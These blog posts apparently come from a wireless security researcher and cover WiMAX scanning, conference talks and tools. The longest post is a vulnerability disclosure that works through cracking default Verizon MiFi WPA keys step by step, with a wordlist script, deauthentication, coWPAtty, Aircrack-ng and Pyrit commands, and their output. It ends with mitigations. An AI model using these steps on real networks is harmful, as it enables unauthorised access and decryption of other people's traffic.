My good friend, fellow SANS instructor, sushi lover, colleague and boss, Mike Poor, has started a blog about packets over at www.packetstan.com. Iâ€™ve been working on the site and have posted a 3-part series of articles assessing the Apple FaceTime protocol. Stop by and take a look.
I'm in Baltimore this week teaching Ethical Hacking Wireless. We're having a lot of fun, and since we're in Baltimore, it's a good opportunity to spend some time with WiMAX and the Clear (Sprint) network here.
I stopped off at Best Buy a few hours ago and picked up a Motorola WiMAX Clear modem (CPEi 725) for US$90. A little while later, I whipped up a tool to use it for scanning WiMAX networks in the area, shown below.
C:\dev>python wimax-scanner.py BS ID RSSI Sector ID NAP ID Freq. 0x000002012136Â -86 0x36Â 0x02 2.56150 GHz 0x000002000034Â -75 0x34Â 0x02 2.54150 GHz 0x0000020000e4Â -76 0xe4Â 0x02 2.54150 GHz C:\dev>python wimax-scanner.py BS ID RSSI Sector ID NAP ID Freq. 0x000002011ca5Â -85 0xa5Â 0x02 2.65700 GHz 0x000002000034Â -72 0x34Â 0x02 2.54150 GHz 0x000002000014Â -84 0x14Â 0x02 2.56150 GHz 0x000002000088Â -90 0x88Â 0x02 2.55150 GHz 0x0000020000e4Â -76 0xe4Â 0x02 2.54150 GHz 0x000002000094Â -86 0x94Â 0x02 2.65700 GHz 0x0000020000b2Â -87 0xb2Â 0x02 2.66700 GHz
More to come.
Brad brought the FreeRADIUS-WPE patch up to date for FreeRADIUS 2.1.7, which I've posted in the Offensive Section. This tool still works very reliably for me, and it's always a treat when a target wireless network is running PEAP or TTLS and I get to use it.
Last night at SANS SecWest 2010 in San Diego I gave a presentation I've been working on called "Maximum Overdrive Redux", looking at exploiting embedded and smart hardware systems.Â We started off with the AC/DC Video from the 1986 Stephen King movie about how machines take over and start killing people, eventually manipulating them into human pawns.
This movie was pretty bad, and Stephen King is even quoted as saying "I was coked out of my head" during direction.Â As a result, it became a cult classic, and I thought it was a pretty good analogy for what we're seeing with the increased reliance, interconnectivity, and physical-world access in embedded systems.
I made four critical points in the presentation:
- Tools for exploiting embedded systems are available and getting better;
- Embedded systems are becoming more interconnected;
- Vendors are widely overlooking the security of embedded platforms;
- Attackers can leverage flaws in embedded systems to exploit the physical world.
I backed up these points by looking at attacks against smart card parking meters, home area networks, Internet-connected vehicle control systems, Verizon MiFi devices, the SHODAN Computer Search Engine, NIBE Heat Pumps and more.Â I've posted the slides in the PresentationsÂ section.
Comments, questions, concerns? Please drop me a note.Â Thanks! -Josh
In my previous post, I wrote about a method to exploit the default password selection on Verizon MiFi devices.Â As a MiFi user, I'm also interested in other ways I can manipulate the device.
The configuration settings for the MiFi are fairly straightforward, and some users have pointed out that there are additional settings that can be applied via a customized config file (browse to Advanced -> Config File -> Download File then edit and upload).Â However, the MiFi also has a hidden advanced configuration page accessible atÂ http://192.168.1.1/adv802.html that is not otherwise linked on the administrative pages.
On this page we are able to set a variety of options not accessible with the default management interface:
- Leverage WEP as an encryption and authentication mechanism (yay!);
- Increase the number of simultaneous stations allowed to share the MiFi WLAN at any given time;
- Adjust the transmit power level of the WLAN interface for more range or longer battery life;
- Manipulate other wireless settings very few people understand and even fewer care about.
These changes have been available by manually editing the config.xml file previously, but now you can do it without all the hassle of XML+notepad.
Update: Please also see my post about the hidden page for advanced MiFi configuration settings.
Recently, I picked up a Verizon MiFi device for $50 and the extension of my service contract for another 2 years. The fun that I've had with the device so far has well made up for both costs.
The MiFi is a battery-powered 802.11b/g AP slightly smaller than an iPhone that features an integrated EV-DO uplink. This device replaced my former USB EV-DO WAN card*, allowing me to share the EV-DO connectivity with multiple devices over WiFi. It's been immensely useful since I commonly travel with 3 laptops, not to mention additional mobile devices.
From a security perspective, the MiFi device uses a unique WPA pre-shared key (PSK) for authentication with the TKIP cipher for encryption. It's unclear why the device doesn't use WPA2-PSK authentication with the AES-CCMP cipher; perhaps it was a security trade-off by the manufacturer to maintain the greatest possibility compatibility with legacy devices that only support WPA-PSK/TKIP.
On the reverse side of the MiFi is a label, identifying the default SSID and PSK used for authentication. Besides the obvious marketing angle Verizon gets from including its name in the SSID, this allows the user to quickly identify and connect to their personal WiFi network to leverage the EV-DO uplink.
Like any good hacker, I turn to the tools that I know to be tried and true. Kismet is a powerful assessment and evaluation tool for wireless networks, providing additional insight into the MiFi wireless LAN interface.
Cursory analysis of the beacon information elements don't reveal anything particularly interesting, though the Kismet screen-shot gives us a point of correlation. The MiFi SSID on my product is "Verizon MiFi DAD1 Secure", slightly different than that of the MiFi device label (where Kismet reports the addition of " Secure" to the SSID, and the mixed-case "MiFi", which is important to us).
Also, we can see that the "DAD1" in the SSID matches the last two bytes of the AP's MAC address (or Basic Service Set Identifier - BSSID). From this we can determine that Verizon has no more than 65,536 unique SSID's for MiFi devices (potentially less; more data is needed to determine if all 16-bits of the BSSID are evenly distributed among devices).
The password on the back of the MiFi device also reveals some interesting information. From the photo above, the password on my MiFi device is:
This password value likely breaks down into four fields:
- Manufacture Year: "09" represents the 2-character year of manufacture.
- Manufacture Month: "11" represents the 2-character month code.
- Manufacture Day?: "19" represents the 2-character day code (NB: This could be wrong, one sample had a value of "34" here, need more data).
- Sequential Identifier: "00891" represents the 5-character sequential identifier code.
Based on this assessment, we can determine that the password selection for the MiFi default is weak. Instead of 11 numeric values with an effective entropy of approximately 36 bits, the MiFi password only has an effective entropy of less than 17 bits for a given 6-byte prefix. If the concept of a manufacture date-stamp is true for the 6-byte prefix, then we have a relatively small search space to find the default MiFi PSK.
Knowing that for a given 6-byte password prefix there are only 100,000 possible passwords, we can get down to exploiting a given MiFi device. We don't know how many 6-byte prefixes are in use, but that's where YOU THE READER come in. Please let me know what prefixes you see on your individual devices, and I'll add them to the attack set.
Talking amongst my wonderful colleagues at InGuardians, I was able to identify 4 unique manufacture prefixes. Assuming the target device is one of these values, we can quickly build a dictionary to attack the PSK selection with a small Python script and a tool such as coWPAtty or Aircrack-ng:
#!/usr/bin/env python import sys # remove executable name sys.argv.pop(0) if len(sys.argv) == 0: print "Must specify the 6-digit manufacture date (e.g. \"091119\")." sys.exit(1) for arg in sys.argv: for i in xrange(0,100000): print "%s%05d"%(arg, i)
You can download this source as mifi-passgen.py. Running this script and redirecting it to a file (e.g. "./mifi-passgen.py 091118 091119 091120 091121 >mifi-wordlist.txt") allows us to pass it to your favorite WPA cracking tool.
Once the wordlist is ready, we need to capture the WPA handshake for a given client. This is straightforward with Kismet, or a tool like Airodump-ng. In this example, I'll use Airodump-ng and Aireplay-ng to fake a deauthenticate message, forcing the victim to disconnect and reconnect to the MiFi AP (because I'm an impatient attacker). First, I'll start Airodump-ng:
root@bt:~# airmon-ng start wlan0 11 Interface Chipset Driver wlan0 Atheros ath5k - [phy0] (monitor mode enabled on mon0) wlan0mon Atheros ath5k - [phy0] root@bt:~# airodump-ng --bssid 00:21:E8:B2:DA:D1 -w mifi-dad1 --channel 11 wlan0mon
Next, Aireplay-ng is used to deauthenticate a user. I send 5 deauth messages, just to make sure the target receives at least one:
root@bt:~# aireplay-ng --deauth 5 -a 00:21:E8:B2:DA:D1 wlan0mon 16:53:14 Waiting for beacon frame (BSSID: 00:21:E8:B2:DA:D1) on channel 11 NB: this attack is more effective when targeting a connected wireless client (-c ). 16:53:14 Sending DeAuth to broadcast -- BSSID: [00:21:E8:B2:DA:D1] 16:53:14 Sending DeAuth to broadcast -- BSSID: [00:21:E8:B2:DA:D1] 16:53:15 Sending DeAuth to broadcast -- BSSID: [00:21:E8:B2:DA:D1] 16:53:15 Sending DeAuth to broadcast -- BSSID: [00:21:E8:B2:DA:D1] 16:53:16 Sending DeAuth to broadcast -- BSSID: [00:21:E8:B2:DA:D1]
Returning to the Airodump-ng window, we can see that it has observed a WPA handshake, identifying the MAC address of the MiFi AP. Terminate the Airodump-ng session by issuing "CTRL+C".
With the Airodump-ng packet capture file mifi-dad1-01.cap, and the dictionary file containing the potential passwords for the target MiFi device, we can implement the WPA/WPA2 brute-force dictionary attack using coWPAtty:
root@bt:~# cowpatty -r mifi-dad1-01.cap -f mifi-wordlist.txt -s "Verizon MiFi2200 DAD1 Secure" cowpatty 4.6 - WPA-PSK dictionary attack. Collected all necessary data to mount crack against WPA/PSK passphrase. Starting dictionary attack. Please be patient. The PSK is "09111900891". 892 passphrases tested in 4.60 seconds: 193.97 passphrases/second
... or Aircrack-ng.
root@bt:~# aircrack-ng mifi-dad1-01.cap -w mifi-wordlist.txt
This is fun and evil and all, but we can get even more evil, can't we?
Exploitation (with 100% more Evil)
We know that WPA/WPA2-PSK networks are vulnerable to offline dictionary attacks, despite the efforts of the IEEE 802.11 committee to thwart the attack by reducing the speed of password guessing. Manipulating this mechanism, tools such as coWPAtty's "genpmk" and Aircrack-ng's "Airolib-ng" spend up-front time precomputing all the possible key guesses in a dictionary file, accelerating the cracking time when the attack is implemented. A limiting factor in this precomputation attack is that all the password guesses need to be computed for each unique SSID.
Recall that the MiFi SSID is in the form "Verizon MiFi2200 ???? Secure", where the SSID is the same for each device with the exception of the 4 ASCII characters representing last 2 bytes of the wireless BSSID. With only 2 bytes difference between each SSID, there is a limit of 65,536 potential SSID's.
Using the WPA/WPA2-PSK precomputation attack, we can precompute the password guesses based on the manufacture date and sequential identifier for each of the 65K SSID's. Once this is precomputed, it becomes possible to recover the password for any default MiFi configuration in a matter of seconds.
Leveraging standard host CPU's, it might take a long time to precompute all the password guesses for each of the 65K SSID's. Fortunately, we aren't constrained to the speed of common CPU's.
While coWPAtty and Aircrack-ng made strides in improving the speed of attacking WPA/WPA2-PSK networks, they pale in comparison to the excellent work of Lukas Lueg and the Pyrit project. Pyrit leverages both the performance of standard CPU's for precomputing password guesses for PSK networks, as well as the impressive computing power of video accelerators, including the Nvidia CUDA line.
If we assume there are 12 manufacture date prefixes, we are left with a password list of 1.2 million entries. Computing all the possible password hashes for each of the 65K SSID's on a Core2Duo 2.5 GHz SSE2 would take almost two years to complete. Leveraging 4 GeForce 295 CUDA cards on a single host would require only 10.2 days.
With the database capabilities added to Pyrit, we can get this attack setup fairly easily. After installing Pyrit (getting the source from SVN and installing sqlalchemy described here), we need to configure Pyrit to use a database for storage. I'm using sqlite in this example by editing the ~/.pyrit/config file as shown:
#default_storage = file:// # Change this path to an appropriate one for your filesystem default_storage = sqlite:////Users/josh/hack/MiFi-PSK/mifi-psk.db rpc_announce = true rpc_announce_broadcast = false rpc_knownclients = rpc_server = true
Once the sqlite database storage reference is set, we can create all 65K MiFi SSID's using a simple Python script:
#!/usr/bin/env python import cpyrit.storage store = cpyrit.storage.getStorage('sqlite:///mifi-psk.db') for i in xrange(0,256): for j in xrange(0,256): essid = "Verizon MiFi2200 %02X%02X Secure"%(i,j) store.essids.create_essid(essid) print "Created %s"%essid
You can download this source as pyrit-mifi-ssids.py. Change to the directory path you established in the Pyrit config file, then create the SSID's for Pyrit:
$ cd /Users/josh/hack/MiFi-PSK $ ./pyrit-mifi-ssids.py Created Verizon MiFi2200 0000 Secure Created Verizon MiFi2200 0001 Secure Created Verizon MiFi2200 0002 Secure Created Verizon MiFi2200 0003 Secure ... Created Verizon MiFi2200 FFFF Secure
Once the SSID's have been loaded, we can load the passwords into the Pyrit database as well. Returning to the mifi-passgen.py script, we can pipe the output directly to Pyrit, as shown.
$ ./mifi-passgen.py 091118 091119 091120 091121 | pyrit -i - import_passwords Pyrit 0.2.5-dev (svn r209) (C) 2008-2010 Lukas Lueg http://pyrit.googlecode.com This code is distributed under the GNU General Public License v3+ Connecting to storage at 'sqlite:////Users/josh/hack/MiFi-PSK/mifi-psk.db'... connected. 400000 lines read. Flushing buffers.... ... All done.
Next, we allow Pyrit to precompute the passphase guesses for us, leveraging the available CPU and offload capabilities:
$ pyrit batch Pyrit 0.2.5-dev (svn r209) (C) 2008-2010 Lukas Lueg http://pyrit.googlecode.com This code is distributed under the GNU General Public License v3+ Connecting to storage at 'sqlite:////Users/josh/hack/MiFi-PSK/mifi-psk.db'... connected. Working on ESSID 'Verizon MiFi2200 4109 Secure' Processed 2/256 workunits so far (0.8%); 480 PMKs per second. ...
The great part is that this only needs to be done once. It could take days or weeks depending on your available hardware, but once it is complete, it can be used by anyone to recover the default password on any MiFi device.
To leverage the Pyrit database, we can use the "attack_db" option with our packet capture, as shown.
$ pyrit -r mifi-dad1-01.cap attack_db Pyrit 0.2.5-dev (svn r209) (C) 2008-2010 Lukas Lueg http://pyrit.googlecode.com This code is distributed under the GNU General Public License v3+ Connecting to storage at 'sqlite:////Users/josh/hack/Mifi-PSK/mifi-psk.db'... connected. Parsing file 'mifi-dad1-01.cap' (1/1)... 8816 packets (8816 802.11-packets), 1 APs Picked AccessPoint 00:21:e8:b2:da:d1 ('Verizon MiFi2200 DAD1 Secure') automatically. Attacking handshake with Station 00:1c:b3:b8:76:6c... Tried 57504 PMKs so far (57.4%); 107722 PMKs per second.. The password is '09111900891'.
Using this technique, an attacker can recover the default password from any MiFi device. The impact of this attack can vary, but three immediate concerns come to mind:
- Utilization Fees: Verizon limits users to 5 GB data transfer a month over EV-DO account; exceeding this watermark racks up significant fees for the end-user. A neer-do-well could compromise a MiFi device and leverage it for their download purposes, potentially avoiding racking up their own Internet use charges, or just to cause trouble for the victim.
- Client Attack: For organizations deploying MiFi devices for their road-warriors, an attacker may compromise the PSK on the MiFi wireless interface for the opportunity to exploit the client devices using the network interface. This may be in an effort to gain access to a system over a weak network interface, allowing them to return to their more secure network to attack other internal hosts.
- Traffic Decryption: If an attacker can identify the correct PSK for the MiFi network, then they can also decrypt all the traffic on the network with Wireshark or Airdecap-ng.Â This could be used to passively collect sensitive information, or to actively exploit the client browser or other network traffic.
Fortunately, there are a couple of options available to us to mitigate this attack.
- Change the Default PSK: Before deploying the MiFi device, be sure to change the PSK to a non-default value. The IEEE 802.11-2007 specification reads "A key generated from a passphrase of less than about 20 characters is unlikely to deter attacks."; I think this is good advice.
- Change the Default SSID: Change the default SSID from "Verizon MiFi2200 XXXX Secure" to another value that is not common, but not unique either (somewhere in the middle) to mitigate precomputed PSK attacks, as well as general wireless anonymity attacks.
Enteprise organizations and end-users alike should apply both these recommendations to thwart attacks against the MiFi deficiency in password selection, as well as weaknesses in WPA/WPA2-PSK in general.
The Verizon MiFi is a great tool, but the engineering team who created the default password mechanism should have taken into consideration the limited entropy in the selection of passwords, and the well-publicized attacks against WPA-PSK networks to limit customer exposure. Coincidentally, this is a topic we examine in my SANS Institute Ethical Hacking Wireless course, where we dig into a variety of wireless systems including WiFi, Bluetooth, WiMAX, GSM, proprietary protocols and more. If you are interested in wireless security topics, I recommend you check out the course sample or sign right up for the biggest SANS conference of the year in Orlando, FL, March 8th - 13th.
* On an hourly basis, this is the message my last Verizon USB EV-DO card gave me. The screen-shot says it all.
CeWL is a custom wordlist generator written by Robin Wood. Written in Ruby, CeWL takes a target website as an argument and crawls the site for HTML, MS Office (2007 and earlier) and PDF documents. For each supported document, CeWL extracts the words, email addresses and metadata to build a wordlist.
Used with tools such as Asleap and coWPAtty, CeWL's wordlist generation technique can be very useful, building a dictionary off words found on the target website. This often includes project names, acronyms and other content that apply specifically to the target and may be successful in a dictionary attack where standard dictionary words would not.
While I'm working on another project, I've departed from Gentoo to run Ubuntu 9.10. I'm looking forward to the day I can return to Gentoo, but until then, I got CeWL to run on Ubuntu without much complication:
$ sudo apt-get install exif libimage-exiftool-perl $ sudo gem install http_configuration spider mime-types mini_exiftool rubyzip spider $ echo "export RUBYOPT=\"rubygems\"" >>~/.bashrc $ source ~/.bashrc $ wget http://www.digininja.org/files/cewl_2.2.tar.bz2 $ tar xvfj cewl_2.2.tar.bz2 $ cd cewl $ ./cewl.rb --help cewl 2.0 Robin Wood (email@example.com) (www.digininja.org) Usage: cewl [OPTION] ... URL --help, -h: show help --depth x, -d x: depth to spider to, default 2 --min_word_length, -m: minimum word length, default 3 --offsite, -o: let the spider visit other sites --write, -w file: write the output to the file --ua, -u user-agent: useragent to send --no-words, -n: don't output the wordlist --meta, -a: include meta data --email, -e: include email addresses --meta-temp-dir directory: the temporary directory used by exiftool when parsing files, default /tmp -v: verbose URL: The site to spider.
CeWL is one of the tools we cover in my Ethical Hacking Wireless course, running next in New Orleans on January 11-16. It's not too late to sign up for this class, and escape the winter chill for good food and wireless hacking in New Orleans.
QuahogCon is the first hacker conference to hit Rhode Island, April 23-25, 2010. Held in the fancy Hotel Providence in downtown Providence, this conference is 1/2 infosec and 1/2 hardware hacking and DIY electronics.Â I've submitted a proposal to talk about my research on ZigBee technology which will nicely bridge both the infosec and hackware hacking side of the conference.
I'm friendly with a lot of the folks putting on this conference, and I'm looking forward to the talks and events like badge hacking.Â Take a look at the QuahogCon website and consider submitting a talk. I hope to see you there!
Yesterday I presented my findings on the security implications of the ZigBee protocol at ToorCon 11. I had a great audience and the presentation went smoothly where we looked at the basis of ZigBee technology and why ZigBee is important for embedded developers and interesting to attackers.
I also introduced a new project I've been working on dubbed KillerBee. KillerBee is a Python-based framework with several tools designed to exploit deficiencies in the design and implementation of ZigBee and IEEE 802.15.4 networks. The hardware I'm using with KillerBee is the AVR RZUSB stick, available from electronics resellers such as DigiKey and Mouser for $40/USD.
I'm still working on KillerBee, and it's not quite ready for prime time yet. I'm planning on doing a full release at ShmooCon, so if you are interested in doing some hands-on ZigBee hacking at Shmoo, pick up a few RZUSB sticks and come find me at the InGuardians booth. I had a bunch of CD's printed up and distributed at ToorCon for an early preview of KillerBee, sample packet captures, specification documentation and more. If you want to get a copy of that, please drop me a note.
On Saturday at ToorCon 11 I'm presenting my work in designing a framework and tools to exploit and manipulate ZigBee and IEEE 802.15.4 networks. KillerBee has been about 9 months in development, written in Python, leveraging the AVR RZUSB Stick as the interface to interact with these low-power networks.
ZigBee is a interesting wireless technology, not due to any particularly innovative design mechanisms (and certainly not from a robust security perspective) but because it interfaces with the kinetic world more than any other wireless protocol I've run into. It would be unheard of to use WiFi as a mechanism to control gas valves in distribution mains, and you would never see Bluetooth controlling a flood release main, yet ZigBee and IEEE 802.15.4 seem to fit in with these scenarios, often with little in the way of mature security testing.
My hope is that people evaluating ZigBee and IEEE 802.15.4 technology will be able to leverage KillerBee as a platform to test third-party products (and, for vendors, to test their own products) for vulnerabilities. In my presentation on Saturday, I'll detail several examples of how I've been using KillerBee for this purpose, and how you can as well.
After the conference I'll post my slides here, so stay tuned. If you are coming to ToorCon, please be sure to stop by and say "Hi".